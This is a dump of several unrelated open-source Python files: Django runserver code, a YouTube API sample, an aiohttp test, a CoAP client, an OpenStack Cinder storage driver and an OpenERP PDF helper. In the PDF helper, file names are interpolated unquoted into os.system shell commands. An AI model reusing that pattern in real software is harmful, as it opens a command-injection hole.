from django.utils import translation
print "Validating models..."
self.validate(display_num_errors=True)
print "\nDjango version %s, using settings %r" % (django.get_version(), settings.SETTINGS_MODULE)
print "Development server is running at http://%s:%s/" % (addr, port)
print "Quit the server with %s." % quit_command
# django.core.management.base forces the locale to en-us. We should
# set it up correctly for the first request (particularly important
# in the "--noreload" case).
translation.activate(settings.LANGUAGE_CODE)
try:
handler = AdminMediaHandler(WSGIHandler(), admin_media_path)
run(addr, int(port), handler)
except WSGIServerException, e:
# Use helpful error messages instead of ugly tracebacks.
ERRORS = {
13: "You don't have permission to access that port.",
98: "That port is already in use.",
99: "That IP address can't be assigned-to.",
}
try:
error_text = ERRORS[e.args[0].args[0]]
except (AttributeError, KeyError):
error_text = str(e)
sys.stderr.write(self.style.ERROR("Error: %s" % error_text) + '\n')
# Need to use an OS exit because sys.exit doesn't work in a thread
os._exit(1)
except KeyboardInterrupt:
if shutdown_message:
print shutdown_message
sys.exit(0)
if use_reloader:
from django.utils import autoreload
autoreload.main(inner_run)
else:
inner_run()
|
lhongskie/yt-samples-python | refs/heads/master | channel_bulletin.py | 1 | #!/usr/bin/python
import httplib2
import os
import sys
from apiclient.discovery import build
from oauth2client.file import Storage
from oauth2client.client import flow_from_clientsecrets
from oauth2client.tools import run
from optparse import OptionParser
# CLIENT_SECRETS_FILE, name of a file containing the OAuth 2.0 information for
# this application, including client_id and client_secret. You can acquire an
# ID/secret pair from the API Access tab on the Google APIs Console
# http://code.google.com/apis/console#access
# For more information about using OAuth2 to access Google APIs, please visit:
# https://developers.google.com/accounts/docs/OAuth2
# For more information about the client_secrets.json file format, please visit:
# https://developers.google.com/api-client-library/python/guide/aaa_client_secrets
# Please ensure that you have enabled the YouTube Data API for your project.
CLIENT_SECRETS_FILE = "client_secrets.json"
# An OAuth 2 access scope that allows for full read/write access.
YOUTUBE_READ_WRITE_SCOPE = "https://www.googleapis.com/auth/youtube"
YOUTUBE_API_SERVICE_NAME = "youtube"
YOUTUBE_API_VERSION = "v3"
# Helpful message to display if the CLIENT_SECRETS_FILE is missing.
MISSING_CLIENT_SECRETS_MESSAGE = """
WARNING: Please configure OAuth 2.0
To make this sample run you will need to populate the client_secrets.json file
found at:
%s
with information from the APIs Console
https://code.google.com/apis/console#access
For more information about the client_secrets.json file format, please visit:
https://developers.google.com/api-client-library/python/guide/aaa_client_secrets
""" % os.path.abspath(os.path.join(os.path.dirname(__file__),
CLIENT_SECRETS_FILE))
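# Example invocation (the video ID below is only a placeholder):
#   python channel_bulletin.py --message="Check out this video" --videoid=VIDEO_ID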
def get_authenticated_service():
flow = flow_from_clientsecrets(CLIENT_SECRETS_FILE,
scope=YOUTUBE_READ_WRITE_SCOPE,
message=MISSING_CLIENT_SECRETS_MESSAGE)
storage = Storage("%s-oauth2.json" % sys.argv[0])
credentials = storage.get()
if credentials is None or credentials.invalid:
credentials = run(flow, storage)
return build(YOUTUBE_API_SERVICE_NAME, YOUTUBE_API_VERSION,
http=credentials.authorize(httplib2.Http()))
def post_bulletin(youtube, options):
body = dict(
snippet=dict(
description=options.message
)
)
if options.videoid:
body["contentDetails"] = dict(
bulletin=dict(
resourceId=dict(
kind="youtube#video",
videoId=options.videoid
)
)
)
if options.playlistid:
body["contentDetails"] = dict(
bulletin=dict(
resourceId=dict(
kind="youtube#playlist",
playlistId=options.playlistid
)
)
)
youtube.activities().insert(
part=",".join(body.keys()),
body=body
).execute()
print "The bulletin was posted to your channel."
if __name__ == "__main__":
parser = OptionParser()
parser.add_option("--message", dest="message",
help="Required text of message to post.")
parser.add_option("--videoid", dest="videoid",
help="Optional ID of video to post.")
parser.add_option("--playlistid", dest="playlistid",
help="Optional ID of playlist to post.")
(options, args) = parser.parse_args()
# You can post a message with or without an accompanying video or playlist.
# You can't post both a video and playlist at the same time.
if options.videoid and options.playlistid:
parser.print_help()
exit("\nYou cannot post a video and a playlist at the same time.")
if not options.message:
parser.print_help()
exit("\nPlease provide a message.")
youtube = get_authenticated_service()
post_bulletin(youtube, options)
|
aio-libs/aiohttp-debugtoolbar | refs/heads/master | tests/test_server_push.py | 1 | import json
from aiohttp_debugtoolbar import APP_KEY
async def test_sse(create_server, aiohttp_client):
async def handler(request):
raise NotImplementedError
app = await create_server()
app.router.add_route('GET', '/', handler)
client = await aiohttp_client(app)
# make sure that exception page rendered
resp = await client.get('/')
txt = await resp.text()
assert 500 == resp.status
assert '<div class="debugger">' in txt
# get request id from history
history = app[APP_KEY]['request_history']
request_id = history[0][0]
url = '/_debugtoolbar/sse'
resp = await client.get(url)
data = await resp.text()
data = data.strip()
# split and check EventSource data
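    # The SSE body is expected to be exactly three lines ("id: ...",
    # "event: new_request" and "data: <json>"), which is why the stripped
    # text splits into three parts here.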
event_id, event, payload_raw = data.split('\n')
assert event_id == 'id: {}'.format(request_id)
assert event == 'event: new_request'
    payload_json = payload_raw[len('data: '):]
payload = json.loads(payload_json)
expected = [[request_id, {"path": "/",
"scheme": "http",
"method": "GET",
"status_code": 500},
""]]
assert payload == expected, payload
|
thejdeep/CoAPthon | refs/heads/master | coapthon/client/coap.py | 2 | import logging.config
import random
import socket
import threading
import time
from coapthon import defines
from coapthon.layers.blocklayer import BlockLayer
from coapthon.layers.messagelayer import MessageLayer
from coapthon.layers.observelayer import ObserveLayer
from coapthon.layers.requestlayer import RequestLayer
from coapthon.messages.message import Message
from coapthon.messages.request import Request
from coapthon.messages.response import Response
from coapthon.serializer import Serializer
__author__ = 'Giacomo Tanganelli'
logger = logging.getLogger(__name__)
class CoAP(object):
"""
Client class to perform requests to remote servers.
"""
def __init__(self, server, starting_mid, callback, sock=None, cb_ignore_read_exception=None, cb_ignore_write_exception=None):
"""
Initialize the client.
:param server: Server address for incoming connections
:param callback:the callback function to be invoked when a response is received
:param starting_mid: used for testing purposes
:param sock: if a socket has been created externally, it can be used directly
:param cb_ignore_read_exception: Callback function to handle exception raised during the socket read operation
:param cb_ignore_write_exception: Callback function to handle exception raised during the socket write operation
"""
self._currentMID = starting_mid
self._server = server
self._callback = callback
self._cb_ignore_read_exception = cb_ignore_read_exception
self._cb_ignore_write_exception = cb_ignore_write_exception
self.stopped = threading.Event()
self.to_be_stopped = []
self._messageLayer = MessageLayer(self._currentMID)
self._blockLayer = BlockLayer()
self._observeLayer = ObserveLayer()
self._requestLayer = RequestLayer(self)
addrinfo = socket.getaddrinfo(self._server[0], None)[0]
if sock is not None:
self._socket = sock
elif addrinfo[0] == socket.AF_INET:
self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
else:
self._socket = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._receiver_thread = None
def close(self):
"""
Stop the client.
"""
self.stopped.set()
for event in self.to_be_stopped:
event.set()
if self._receiver_thread is not None:
self._receiver_thread.join()
self._socket.close()
@property
def current_mid(self):
"""
Return the current MID.
:return: the current mid
"""
return self._currentMID
@current_mid.setter
def current_mid(self, c):
"""
Set the current MID.
:param c: the mid to set
"""
assert isinstance(c, int)
self._currentMID = c
def send_message(self, message):
"""
Prepare a message to send on the UDP socket. Eventually set retransmissions.
:param message: the message to send
"""
if isinstance(message, Request):
request = self._requestLayer.send_request(message)
request = self._observeLayer.send_request(request)
request = self._blockLayer.send_request(request)
transaction = self._messageLayer.send_request(request)
self.send_datagram(transaction.request)
if transaction.request.type == defines.Types["CON"]:
self._start_retransmission(transaction, transaction.request)
elif isinstance(message, Message):
message = self._observeLayer.send_empty(message)
message = self._messageLayer.send_empty(None, None, message)
self.send_datagram(message)
@staticmethod
def _wait_for_retransmit_thread(transaction):
"""
Only one retransmit thread at a time, wait for other to finish
"""
if hasattr(transaction, 'retransmit_thread'):
while transaction.retransmit_thread is not None:
logger.debug("Waiting for retransmit thread to finish ...")
time.sleep(0.01)
continue
def _send_block_request(self, transaction):
"""
A former request resulted in a block wise transfer. With this method, the block wise transfer
will be continued, including triggering of the retry mechanism.
:param transaction: The former transaction including the request which should be continued.
"""
transaction = self._messageLayer.send_request(transaction.request)
# ... but don't forget to reset the acknowledge flag
transaction.request.acknowledged = False
self.send_datagram(transaction.request)
if transaction.request.type == defines.Types["CON"]:
self._start_retransmission(transaction, transaction.request)
def send_datagram(self, message):
"""
Send a message over the UDP socket.
:param message: the message to send
"""
host, port = message.destination
logger.debug("send_datagram - " + str(message))
serializer = Serializer()
raw_message = serializer.serialize(message)
try:
self._socket.sendto(raw_message, (host, port))
except Exception as e:
if self._cb_ignore_write_exception is not None and callable(self._cb_ignore_write_exception):
if not self._cb_ignore_write_exception(e, self):
raise
if self._receiver_thread is None or not self._receiver_thread.isAlive():
self._receiver_thread = threading.Thread(target=self.receive_datagram)
self._receiver_thread.start()
def _start_retransmission(self, transaction, message):
"""
Start the retransmission task.
:type transaction: Transaction
:param transaction: the transaction that owns the message that needs retransmission
:type message: Message
:param message: the message that needs the retransmission task
"""
with transaction:
if message.type == defines.Types['CON']:
future_time = random.uniform(defines.ACK_TIMEOUT, (defines.ACK_TIMEOUT * defines.ACK_RANDOM_FACTOR))
transaction.retransmit_stop = threading.Event()
self.to_be_stopped.append(transaction.retransmit_stop)
transaction.retransmit_thread = threading.Thread(target=self._retransmit,
name=str('%s-Retry-%d' % (threading.current_thread().name, message.mid)),
args=(transaction, message, future_time, 0))
transaction.retransmit_thread.start()
def _retransmit(self, transaction, message, future_time, retransmit_count):
"""
Thread function to retransmit the message in the future
:param transaction: the transaction that owns the message that needs retransmission
:param message: the message that needs the retransmission task
:param future_time: the amount of time to wait before a new attempt
:param retransmit_count: the number of retransmissions
"""
with transaction:
logger.debug("retransmit loop ... enter")
while retransmit_count <= defines.MAX_RETRANSMIT \
and (not message.acknowledged and not message.rejected) \
and not transaction.retransmit_stop.isSet():
transaction.retransmit_stop.wait(timeout=future_time)
if not message.acknowledged and not message.rejected and not transaction.retransmit_stop.isSet():
retransmit_count += 1
future_time *= 2
if retransmit_count < defines.MAX_RETRANSMIT:
logger.debug("retransmit loop ... retransmit Request")
self.send_datagram(message)
if message.acknowledged or message.rejected:
message.timeouted = False
else:
logger.warning("Give up on message {message}".format(message=message.line_print))
message.timeouted = True
# Inform the user, that nothing was received
self._callback(None)
try:
self.to_be_stopped.remove(transaction.retransmit_stop)
except ValueError:
pass
transaction.retransmit_stop = None
transaction.retransmit_thread = None
logger.debug("retransmit loop ... exit")
def receive_datagram(self):
"""
Receive datagram from the UDP socket and invoke the callback function.
"""
logger.debug("Start receiver Thread")
while not self.stopped.isSet():
self._socket.settimeout(0.1)
try:
datagram, addr = self._socket.recvfrom(1152)
except socket.timeout: # pragma: no cover
continue
except Exception as e: # pragma: no cover
if self._cb_ignore_read_exception is not None and callable(self._cb_ignore_read_exception):
if self._cb_ignore_read_exception(e, self):
continue
return
else: # pragma: no cover
if len(datagram) == 0:
logger.debug("Exiting receiver Thread due to orderly shutdown on server end")
return
serializer = Serializer()
try:
host, port = addr
except ValueError:
host, port, tmp1, tmp2 = addr
source = (host, port)
message = serializer.deserialize(datagram, source)
if isinstance(message, Response):
logger.debug("receive_datagram - " + str(message))
transaction, send_ack = self._messageLayer.receive_response(message)
if transaction is None: # pragma: no cover
continue
self._wait_for_retransmit_thread(transaction)
if send_ack:
self._send_ack(transaction)
self._blockLayer.receive_response(transaction)
if transaction.block_transfer:
self._send_block_request(transaction)
continue
elif transaction is None: # pragma: no cover
self._send_rst(transaction)
return
self._observeLayer.receive_response(transaction)
if transaction.notification: # pragma: no cover
ack = Message()
ack.type = defines.Types['ACK']
ack = self._messageLayer.send_empty(transaction, transaction.response, ack)
self.send_datagram(ack)
self._callback(transaction.response)
else:
self._callback(transaction.response)
elif isinstance(message, Message):
self._messageLayer.receive_empty(message)
logger.debug("Exiting receiver Thread due to request")
def _send_ack(self, transaction):
"""
Sends an ACK message for the response.
:param transaction: transaction that holds the response
"""
ack = Message()
ack.type = defines.Types['ACK']
if not transaction.response.acknowledged:
ack = self._messageLayer.send_empty(transaction, transaction.response, ack)
self.send_datagram(ack)
def _send_rst(self, transaction): # pragma: no cover
"""
Sends an RST message for the response.
:param transaction: transaction that holds the response
"""
rst = Message()
rst.type = defines.Types['RST']
if not transaction.response.acknowledged:
rst = self._messageLayer.send_empty(transaction, transaction.response, rst)
self.send_datagram(rst)
|
openstack/cinder | refs/heads/master | cinder/volume/drivers/hpe/hpe_3par_base.py | 2 | # (c) Copyright 2013-2015 Hewlett Packard Enterprise Development LP
# All Rights Reserved.
#
# Copyright 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""
Base class for HPE Storage Drivers.
This driver requires 3.1.3 or later firmware on the 3PAR array, using
the 4.x version of the hpe3parclient.
You will need to install the python hpe3parclient.
sudo pip install --upgrade "hpe3parclient>=4.0"
"""
try:
from hpe3parclient import exceptions as hpeexceptions
except ImportError:
hpeexceptions = None
from oslo_log import log as logging
from cinder import exception
from cinder.i18n import _
from cinder.volume import driver
from cinder.volume.drivers.hpe import hpe_3par_common as hpecommon
from cinder.volume.drivers.san import san
from cinder.volume import volume_utils
LOG = logging.getLogger(__name__)
class HPE3PARDriverBase(driver.ManageableVD,
driver.ManageableSnapshotsVD,
driver.MigrateVD,
driver.BaseVD):
"""OpenStack base driver to enable 3PAR storage array.
Version history:
.. code-block:: none
1.0.0 - Initial base driver
1.0.1 - Adds consistency group capability in generic volume groups.
1.0.2 - Adds capability.
1.0.3 - Added Tiramisu feature on 3PAR.
1.0.4 - Fixed Volume migration for "in-use" volume. bug #1744021
1.0.5 - Set proper backend on subsequent operation, after group
failover. bug #1773069
"""
VERSION = "1.0.5"
def __init__(self, *args, **kwargs):
super(HPE3PARDriverBase, self).__init__(*args, **kwargs)
self._active_backend_id = kwargs.get('active_backend_id', None)
self.configuration.append_config_values(hpecommon.hpe3par_opts)
self.configuration.append_config_values(san.san_opts)
self.protocol = None
@staticmethod
def get_driver_options():
return hpecommon.HPE3PARCommon.get_driver_options()
def _init_common(self):
return hpecommon.HPE3PARCommon(self.configuration,
self._active_backend_id)
def _login(self, timeout=None, array_id=None):
common = self._init_common()
# If replication is enabled and we cannot login, we do not want to
# raise an exception so a failover can still be executed.
try:
common.do_setup(None, timeout=timeout, stats=self._stats,
array_id=array_id)
common.client_login()
except Exception:
if common._replication_enabled:
LOG.warning("The primary array is not reachable at this "
"time. Since replication is enabled, "
"listing replication targets and failing over "
"a volume can still be performed.")
else:
raise
return common
def _logout(self, common):
# If replication is enabled and we do not have a client ID, we did not
# login, but can still failover. There is no need to logout.
if common.client is None and common._replication_enabled:
return
common.client_logout()
def _check_flags(self, common):
"""Sanity check to ensure we have required options set."""
required_flags = ['hpe3par_api_url', 'hpe3par_username',
'hpe3par_password', 'san_ip', 'san_login',
'san_password']
common.check_flags(self.configuration, required_flags)
def get_volume_replication_driver_data(self, volume):
if (volume.get("group_id") and volume.get("replication_status") and
volume.get("replication_status") == "failed-over"):
return int(volume.get("replication_driver_data"))
return None
@volume_utils.trace
def get_volume_stats(self, refresh=False):
# NOTE(geguileo): We don't need to login to the backed if we are not
# going to refresh the stats, furthermore if we login, then we'll
# return an empty dict, because the _login method calls calls
# _init_common which returns a new HPE3PARCommon instance each time,
# so it won't have any cached values.
if not refresh:
return self._stats
common = self._login()
try:
self._stats = common.get_volume_stats(
refresh,
self.get_filter_function(),
self.get_goodness_function())
self._stats['storage_protocol'] = self.protocol
self._stats['driver_version'] = self.VERSION
backend_name = self.configuration.safe_get('volume_backend_name')
self._stats['volume_backend_name'] = (backend_name or
self.__class__.__name__)
return self._stats
finally:
self._logout(common)
def check_for_setup_error(self):
"""Setup errors are already checked for in do_setup so return pass."""
pass
@volume_utils.trace
def create_volume(self, volume):
common = self._login()
try:
return common.create_volume(volume)
finally:
self._logout(common)
@volume_utils.trace
def create_cloned_volume(self, volume, src_vref):
"""Clone an existing volume."""
common = self._login()
try:
return common.create_cloned_volume(volume, src_vref)
finally:
self._logout(common)
@volume_utils.trace
def delete_volume(self, volume):
common = self._login()
try:
common.delete_volume(volume)
finally:
self._logout(common)
@volume_utils.trace
def create_volume_from_snapshot(self, volume, snapshot):
"""Creates a volume from a snapshot.
TODO: support using the size from the user.
"""
common = self._login()
try:
return common.create_volume_from_snapshot(volume, snapshot)
finally:
self._logout(common)
@volume_utils.trace
def create_snapshot(self, snapshot):
common = self._login()
try:
common.create_snapshot(snapshot)
finally:
self._logout(common)
@volume_utils.trace
def delete_snapshot(self, snapshot):
common = self._login()
try:
common.delete_snapshot(snapshot)
finally:
self._logout(common)
@volume_utils.trace
def extend_volume(self, volume, new_size):
common = self._login()
try:
common.extend_volume(volume, new_size)
finally:
self._logout(common)
@volume_utils.trace
def create_group(self, context, group):
common = self._login()
try:
return common.create_group(context, group)
finally:
self._logout(common)
@volume_utils.trace
def create_group_from_src(self, context, group, volumes,
group_snapshot=None, snapshots=None,
source_group=None, source_vols=None):
common = self._login()
try:
return common.create_group_from_src(
context, group, volumes, group_snapshot, snapshots,
source_group, source_vols)
finally:
self._logout(common)
@volume_utils.trace
def delete_group(self, context, group, volumes):
common = self._login()
try:
return common.delete_group(context, group, volumes)
finally:
self._logout(common)
@volume_utils.trace
def update_group(self, context, group, add_volumes=None,
remove_volumes=None):
common = self._login()
try:
return common.update_group(context, group, add_volumes,
remove_volumes)
finally:
self._logout(common)
@volume_utils.trace
def create_group_snapshot(self, context, group_snapshot, snapshots):
common = self._login()
try:
return common.create_group_snapshot(context, group_snapshot,
snapshots)
finally:
self._logout(common)
@volume_utils.trace
def delete_group_snapshot(self, context, group_snapshot, snapshots):
common = self._login()
try:
return common.delete_group_snapshot(context, group_snapshot,
snapshots)
finally:
self._logout(common)
@volume_utils.trace
def manage_existing(self, volume, existing_ref):
common = self._login()
try:
return common.manage_existing(volume, existing_ref)
finally:
self._logout(common)
@volume_utils.trace
def manage_existing_snapshot(self, snapshot, existing_ref):
common = self._login()
try:
return common.manage_existing_snapshot(snapshot, existing_ref)
finally:
self._logout(common)
@volume_utils.trace
def manage_existing_get_size(self, volume, existing_ref):
common = self._login()
try:
return common.manage_existing_get_size(volume, existing_ref)
finally:
self._logout(common)
@volume_utils.trace
def manage_existing_snapshot_get_size(self, snapshot, existing_ref):
common = self._login()
try:
return common.manage_existing_snapshot_get_size(snapshot,
existing_ref)
finally:
self._logout(common)
@volume_utils.trace
def unmanage(self, volume):
common = self._login()
try:
common.unmanage(volume)
finally:
self._logout(common)
@volume_utils.trace
def unmanage_snapshot(self, snapshot):
common = self._login()
try:
common.unmanage_snapshot(snapshot)
finally:
self._logout(common)
@volume_utils.trace
def retype(self, context, volume, new_type, diff, host):
"""Convert the volume to be of the new type."""
common = self._login()
try:
return common.retype(volume, new_type, diff, host)
finally:
self._logout(common)
@volume_utils.trace
def migrate_volume(self, context, volume, host):
if volume['status'] == 'in-use':
protocol = host['capabilities']['storage_protocol']
if protocol != self.protocol:
LOG.debug("3PAR %(protocol)s driver cannot migrate in-use "
"volume to a host with "
"storage_protocol=%(storage_protocol)s",
{'protocol': self.protocol,
'storage_protocol': protocol})
return False, None
common = self._login()
try:
return common.migrate_volume(volume, host)
finally:
self._logout(common)
@volume_utils.trace
def update_migrated_volume(self, context, volume, new_volume,
original_volume_status):
"""Update the name of the migrated volume to it's new ID."""
common = self._login()
try:
return common.update_migrated_volume(context, volume, new_volume,
original_volume_status)
finally:
self._logout(common)
@volume_utils.trace
def get_pool(self, volume):
common = self._login()
try:
return common.get_cpg(volume)
except hpeexceptions.HTTPNotFound:
reason = (_("Volume %s doesn't exist on array.") % volume)
LOG.error(reason)
raise exception.InvalidVolume(reason)
finally:
self._logout(common)
@volume_utils.trace
def revert_to_snapshot(self, context, volume, snapshot):
"""Revert volume to snapshot."""
common = self._login()
try:
common.revert_to_snapshot(volume, snapshot)
finally:
self._logout(common)
@volume_utils.trace
def failover_host(self, context, volumes, secondary_id=None, groups=None):
"""Force failover to a secondary replication target."""
common = self._login(timeout=30)
try:
# Update the active_backend_id in the driver and return it.
active_backend_id, volume_updates, group_update_list = (
common.failover_host(
context, volumes, secondary_id, groups))
self._active_backend_id = active_backend_id
return active_backend_id, volume_updates, group_update_list
finally:
self._logout(common)
def enable_replication(self, context, group, volumes):
"""Enable replication for a group.
:param context: the context
:param group: the group object
:param volumes: the list of volumes
:returns: model_update, None
"""
common = self._login()
try:
return common.enable_replication(context, group, volumes)
finally:
self._logout(common)
def disable_replication(self, context, group, volumes):
"""Disable replication for a group.
:param context: the context
:param group: the group object
:param volumes: the list of volumes
:returns: model_update, None
"""
common = self._login()
try:
return common.disable_replication(context, group, volumes)
finally:
self._logout(common)
def failover_replication(self, context, group, volumes,
secondary_backend_id=None):
"""Failover replication for a group.
:param context: the context
:param group: the group object
:param volumes: the list of volumes
:param secondary_backend_id: the secondary backend id - default None
:returns: model_update, vol_model_updates
"""
common = self._login()
try:
return common.failover_replication(
context, group, volumes, secondary_backend_id)
finally:
self._logout(common)
def do_setup(self, context):
common = self._init_common()
common.do_setup(context)
self._check_flags(common)
common.check_for_setup_error()
self._do_setup(common)
def _do_setup(self, common):
pass
def create_export(self, context, volume, connector):
pass
def ensure_export(self, context, volume):
pass
def remove_export(self, context, volume):
pass
def terminate_connection(self, volume, connector, **kwargs):
pass
def initialize_connection(self, volume, connector):
pass
@volume_utils.trace
def _init_vendor_properties(self):
"""Create a dictionary of vendor unique properties.
This method creates a dictionary of vendor unique properties
and returns both created dictionary and vendor name.
Returned vendor name is used to check for name of vendor
unique properties.
- Vendor name shouldn't include colon(:) because of the separator
and it is automatically replaced by underscore(_).
ex. abc:d -> abc_d
- Vendor prefix is equal to vendor name.
ex. abcd
- Vendor unique properties must start with vendor prefix + ':'.
ex. abcd:maxIOPS
Each backend driver needs to override this method to expose
its own properties using _set_property() like this:
self._set_property(
properties,
"vendorPrefix:specific_property",
"Title of property",
_("Description of property"),
"type")
: return dictionary of vendor unique properties
: return vendor name
prefix: HPE:3PAR --> HPE_3PAR
"""
properties = {}
valid_prov_values = ['thin', 'full', 'dedup']
valid_persona_values = ['2 - Generic-ALUA',
'1 - Generic',
'3 - Generic-legacy',
'4 - HPEUX-legacy',
'5 - AIX-legacy',
'6 - EGENERA',
'7 - ONTAP-legacy',
'8 - VMware',
'9 - OpenVMS',
'10 - HPEUX',
'11 - WindowsServer']
self._set_property(
properties,
"HPE:3PAR:hpe3par:snap_cpg",
"Snap CPG Extra-specs.",
_("Specifies the Snap CPG for a volume type. It overrides the "
"hpe3par_cpg_snap setting. Defaults to the hpe3par_cpg_snap "
"setting in the cinder.conf file. If hpe3par_cpg_snap is not "
"set, it defaults to the hpe3par_cpg setting."),
"string")
self._set_property(
properties,
"HPE:3PAR:hpe3par:persona",
"Host Persona Extra-specs.",
_("Specifies the host persona property for a volume type. It "
"overrides the hpe3par_cpg_snap setting. Defaults to the "
"hpe3par_cpg_snap setting in the cinder.conf file. "
"If hpe3par_cpg_snap is not set, "
"it defaults to the hpe3par_cpg setting."),
"string",
enum=valid_persona_values,
default="2 - Generic-ALUA")
self._set_property(
properties,
"HPE:3PAR:hpe3par:vvs",
"Virtual Volume Set Extra-specs.",
_("The virtual volume set name that has been set up by the "
"administrator that would have predefined QoS rules "
"associated with it. If you specify extra_specs "
"hpe3par:vvs, the qos_specs minIOPS, maxIOPS, minBWS, "
"and maxBWS settings are ignored."),
"string")
self._set_property(
properties,
"HPE:3PAR:hpe3par:flash_cache",
"Flash cache Extra-specs.",
_("Enables Flash cache setting for a volume type."),
"boolean",
default=False)
self._set_property(
properties,
"HPE:3PAR:hpe3par:provisioning",
"Storage Provisioning Extra-specs.",
_("Specifies the provisioning for a volume type."),
"string",
enum=valid_prov_values,
default="thin")
self._set_property(
properties,
"HPE:3PAR:hpe3par:compression",
"Storage Provisioning Extra-specs.",
_("Enables compression for a volume type. "
"Minimum requirement of 3par OS version is 3.3.1 "
"with SSD drives only. "
"Volume size must have > 16 GB to enable "
"compression on volume. "
"A full provisioned volume cannot be compressed."),
"boolean",
default=False)
self._set_property(
properties,
"HPE:3PAR:replication_enabled",
"Volume Replication Extra-specs.",
_("The valid value is: <is> True "
"If True, the volume is to be replicated, if supported, "
"by the backend driver. If the option is not specified or "
"false, then replication is not enabled. This option is "
"required to enable replication."),
"string",
enum=["<is> True"],
default=False)
self._set_property(
properties,
"HPE:3PAR:replication:mode",
"Replication Mode Extra-specs.",
_("Sets the replication mode for 3par."),
"string",
enum=["sync", "periodic"],
default="periodic")
self._set_property(
properties,
"HPE:3PAR:replication:sync_period",
"Sync Period for Volume Replication Extra-specs.",
_("Sets the time interval for synchronization. "
"Only needed if replication:mode is periodic."),
"integer",
default=900)
self._set_property(
properties,
"HPE:3PAR:replication:retention_count",
"Retention Count for Replication Extra-specs.",
_("Sets the number of snapshots that will be "
"saved on the primary array."),
"integer",
default=5)
self._set_property(
properties,
"HPE:3PAR:replication:remote_retention_count",
"Remote Retention Count for Replication Extra-specs.",
_("Sets the number of snapshots that will be "
"saved on the secondary array."),
"integer",
default=5)
# ###### QoS Settings ###### #
self._set_property(
properties,
"HPE:3PAR:minIOPS",
"Minimum IOPS QoS.",
_("Sets the QoS, I/O issue count minimum goal. "
"If not specified, there is no limit on I/O issue count."),
"integer")
self._set_property(
properties,
"HPE:3PAR:maxIOPS",
"Maximum IOPS QoS.",
_("Sets the QoS, I/O issue count rate limit. "
"If not specified, there is no limit on I/O issue count."),
"integer")
self._set_property(
properties,
"HPE:3PAR:minBWS",
"Minimum Bandwidth QoS.",
_("Sets the QoS, I/O issue bandwidth minimum goal. "
"If not specified, there is no limit on "
"I/O issue bandwidth rate."),
"integer")
self._set_property(
properties,
"HPE:3PAR:maxBWS",
"Maximum Bandwidth QoS.",
_("Sets the QoS, I/O issue bandwidth rate limit. "
"If not specified, there is no limit on I/O issue "
"bandwidth rate."),
"integer")
self._set_property(
properties,
"HPE:3PAR:latency",
"Latency QoS.",
_("Sets the latency goal in milliseconds."),
"integer")
self._set_property(
properties,
"HPE:3PAR:priority",
"Priority QoS.",
_("Sets the priority of the QoS rule over other rules."),
"string",
enum=["low", "normal", "high"],
default="normal")
return properties, 'HPE:3PAR'
|
savoirfairelinux/OpenUpgrade | refs/heads/master | openerp/tools/pdf_utils.py | 456 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
""" Copyright (c) 2003-2007 LOGILAB S.A. (Paris, FRANCE).
http://www.logilab.fr/ -- mailto:[email protected]
manipulate pdf and fdf files. pdftk recommended.
Notes regarding pdftk, pdf forms and fdf files (form definition file)
fields names can be extracted with:
pdftk orig.pdf generate_fdf output truc.fdf
to merge fdf and pdf:
pdftk orig.pdf fill_form test.fdf output result.pdf [flatten]
without flatten, one could further edit the resulting form.
with flatten, everything is turned into text.
"""
from __future__ import with_statement
import os
import tempfile
HEAD="""%FDF-1.2
%\xE2\xE3\xCF\xD3
1 0 obj
<<
/FDF
<<
/Fields [
"""
TAIL="""]
>>
>>
endobj
trailer
<<
/Root 1 0 R
>>
%%EOF
"""
def output_field(f):
return "\xfe\xff" + "".join( [ "\x00"+c for c in f ] )
def extract_keys(lines):
keys = []
for line in lines:
if line.startswith('/V'):
pass #print 'value',line
elif line.startswith('/T'):
key = line[7:-2]
key = ''.join(key.split('\x00'))
keys.append( key )
return keys
def write_field(out, key, value):
out.write("<<\n")
if value:
out.write("/V (%s)\n" %value)
else:
out.write("/V /\n")
out.write("/T (%s)\n" % output_field(key) )
out.write(">> \n")
def write_fields(out, fields):
out.write(HEAD)
for key in fields:
value = fields[key]
write_field(out, key, value)
# write_field(out, key+"a", value) # pour copie-carbone sur autres pages
out.write(TAIL)
def extract_keys_from_pdf(filename):
# what about using 'pdftk filename dump_data_fields' and parsing the output ?
tmp_file = tempfile.mkstemp(".fdf")[1]
try:
os.system('pdftk %s generate_fdf output \"%s\"' % (filename, tmp_file))
with open(tmp_file, "r") as ofile:
lines = ofile.readlines()
finally:
try:
os.remove(tmp_file)
except Exception:
pass # nothing to do
return extract_keys(lines)
def fill_pdf(infile, outfile, fields):
tmp_file = tempfile.mkstemp(".fdf")[1]
try:
with open(tmp_file, "w") as ofile:
write_fields(ofile, fields)
os.system('pdftk %s fill_form \"%s\" output %s flatten' % (infile, tmp_file, outfile))
finally:
try:
os.remove(tmp_file)
except Exception:
pass # nothing to do
def testfill_pdf(infile, outfile):
keys = extract_keys_from_pdf(infile)
    fields = {}
    for key in keys:
        fields[key] = ''
fill_pdf(infile, outfile, fields)
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
opoplawski/StarCluster | refs/heads/develop | starcluster/commands/terminate.py | 19 | # Copyright 2009-2014 Justin Riley
#
# This file is part of StarCluster.
#
